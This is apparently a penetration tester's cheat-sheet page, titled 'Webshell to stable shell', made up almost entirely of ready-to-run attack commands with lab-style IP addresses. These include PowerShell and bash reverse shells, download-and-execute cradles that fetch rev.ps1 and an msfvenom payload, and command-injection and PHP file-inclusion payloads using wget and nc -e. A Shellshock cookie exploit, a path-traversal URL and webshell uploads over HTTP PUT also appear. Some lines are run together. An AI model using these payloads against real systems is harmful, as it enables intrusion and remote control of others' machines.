Webshell to stable shell
nc -nlvp 4444
Last updated
nc -nlvp 4444
Last updated
${var}=New-Object Net.Sockets.TcpClient('192.168.0.69',4444);${stream}=${var}.GetStream();${buffer}=@();While($true){if(${stream}.DataAvailable){$bufferSize=${stream}.Read($buffer,0,${buffer}.Length);${msg}=(New-Object Text.ASCIIEncoding).GetString($buffer,0,${bufferSize});${command}=(Invoke-Expression -Command $msg 2>&1 | Out-String );${msg}=$command+'PS '+${Pwd}.Path+'>';${buffer}=(New-Object Text.ASCIIEncoding).GetBytes($msg);${stream}.Write($buffer,0,$msg.length);$stream.Flush()};Start-Sleep -s 1}rev.ps#rev-shell.ps
$client = New-Object System.Net.Sockets.TCPClient("192.168.119.184",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#feed
python -m http.server 8080#setup listener
nc -nvlp 443
#run webshell command
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.132:8080/rev.ps1')"
or
echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.119.129/rev.ps1") | powershell -noprofilemsfvenom -p linux/x64/shell_reverse_tcp LPORT=4444 LHOST=192.168.119.138 -f elf -o k
python -m http.server 80
/rev.php
<?php shell_exec("curl http://192.168.119.138/k > /tmp/k;chmod +x /tmp/k; /tmp/k");?>
http://10.11.1.35/section.php?page=http://192.168.119.138/rev.php
curl -s --data "<?php system('bash -i >& /dev/tcp/192.168.119.136/4444 0>&1');?>" "http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=php://input%00"
or shell_exec%0avuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
ip=127.0.0.1 %0a wget 192.168.119.148 %0a mv index.html rev.php %0a php rev.php&send=Ping+It%21
(cannot use - / symbols, so wget index.html disguised rev shell)#after uploading the rev file (copy from kali webshells)
http://10.11.1.141:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/tmp/rev.cgicurl -H "Cookie: () { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/192.168.119.125/4444 0>&1 &" http://10.11.1.71/cgi-bin/admin.cgi -scurl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u user:pw
cadaver ip
curl -T './tmp/file' 'http://192.168.64.122/'
curl -X PUT http://192.168.52.42:8080/shell.jsp/ -d @- < shell.jsp
